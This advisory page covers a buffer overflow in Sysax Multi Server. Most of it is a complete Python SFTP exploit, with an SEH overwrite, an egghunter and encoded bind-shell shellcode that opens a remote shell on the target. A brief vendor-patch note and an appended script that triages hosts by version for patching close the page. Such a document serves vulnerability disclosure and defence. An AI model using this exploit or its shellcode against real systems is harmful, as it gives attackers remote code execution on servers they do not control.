Release date:
Updated on:
Affected Systems:
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Codeorigin Sysax Multi Server 4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52191
Sysax Multi Server is an SSH2 and FTP server for Windows.
Sysax Multi Server contains a buffer overflow vulnerability. An attacker can exploit this vulnerability to execute arbitrary code.
Source: Craig Freyman
Link: http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
#!/usr/bin/python
####################################################################################################
# Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
# Author: Craig Freyman (@cd1zz)
# Tested on: XP SP3 32bit
# Software Versions Tested: 5.53
# Date Discovered: February 22, 2012
# Vendor Contacted: February 23, 2012
# Vendor Response: February 27, 2012
# Vendor Fix: Version 5.55
# Notes: Offset based on home path length. This exploit works for C:\aaaaaaaaaaaaaa
# Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
####################################################################################################
import paramiko, os, sys

if len(sys.argv) != 5:
    print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

# Authenticate over SSH, then open an SFTP session on the same transport
transport = paramiko.Transport((host, port))
transport.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(transport)

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
shell = ("DNWPDNWP"
"\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9"
"\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7"
"\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26"
"\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce"
"\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43"
"\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4"
"\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad"
"\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1"
"\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44"
"\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa"
"\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c"
"\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9"
"\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c"
"\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72"
"\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9"
"\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2"
"\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c"
"\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72"
"\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96"
"\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae"
"\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38"
"\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98"
"\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06"
"\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d"
"\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a"
"\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88"
"\x5c\xc8\x3c\x99")

egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
"\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50"
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

nseh = "\x90\x90\xeb\x08"
junk = "A" * 256
padding = "B" * (256 - len(junk) - len(shell))
seh = "\xA1\x47\x92\x5D"  # 5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
# The oversized remote path is what triggers the overflow on the server
remotepath = junk + nseh + seh + "\x90" * 10 + egghunter + "\x90" * 1000 + shell + "\x90" * 100
localpath = '/tmp/system.log'

print "========================================================================================"
print "Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter)"
print "by cd1zz"
print "www.pwnag3.com"
print "Launching exploit against " + host + " on port " + str(port) + " for XP"
print "========================================================================================"

sftp.get(remotepath, localpath)
sftp.close()
transport.close()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Codeorigin
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.ftpshell.com/index.htm
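As an added illustration for this advisory (it is not the vendor's or the researcher's code), the following Python snippet triages a host inventory against the version information the advisory gives. It assumes that every Sysax Multi Server release older than the vendor fix, version 5.55, should be treated as affected (this covers all versions the advisory lists), and the inventory lines are constructed samples, not real hosts.

```python
import re

# Version data as stated in the advisory: affected releases and the vendor fix.
AFFECTED_VERSIONS = ("4.3", "5.25", "5.50", "5.52", "5.53")
FIXED_VERSION = "5.55"

# Matches the product name followed by a dotted version, e.g. "Sysax Multi Server 5.53".
VERSION_RE = re.compile(r"Sysax Multi Server\s+v?(\d+(?:\.\d+)*)", re.IGNORECASE)


def to_tuple(version_str):
    """'5.53' -> (5, 53) so that versions compare numerically rather than as strings."""
    return tuple(int(part) for part in version_str.split("."))


def parse_version(text):
    """Extract the Sysax Multi Server version from free text; None if no match."""
    match = VERSION_RE.search(text)
    return to_tuple(match.group(1)) if match else None


def is_vulnerable(version):
    """True if the version predates the vendor fix.

    Assumption (not stated on the page): every release older than 5.55 is
    treated as affected. All versions the advisory lists satisfy this.
    """
    return version < to_tuple(FIXED_VERSION)


# Constructed sample inventory lines ("host, product string") for the demo.
SAMPLE_INVENTORY = [
    "ftp-gw-01, Sysax Multi Server 5.53",
    "ftp-gw-02, Sysax Multi Server 5.55",
    "ftp-gw-03, Sysax Multi Server 4.3",
    "ftp-gw-04, OpenSSH 5.9p1",
]


def triage(inventory_lines):
    """Map each host to 'patch', 'ok' or 'unknown' from its product string."""
    result = {}
    for line in inventory_lines:
        host, _, product = line.partition(",")
        version = parse_version(product)
        if version is None:
            status = "unknown"      # not Sysax, or version not recognisable
        elif is_vulnerable(version):
            status = "patch"        # older than the fixed release
        else:
            status = "ok"           # fixed release or later
        result[host.strip()] = status
    return result


if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print("%-12s %s" % (host, status))
```

Hosts marked "unknown" need a manual look rather than being assumed safe; the regex only recognises the product name as it appears in this advisory.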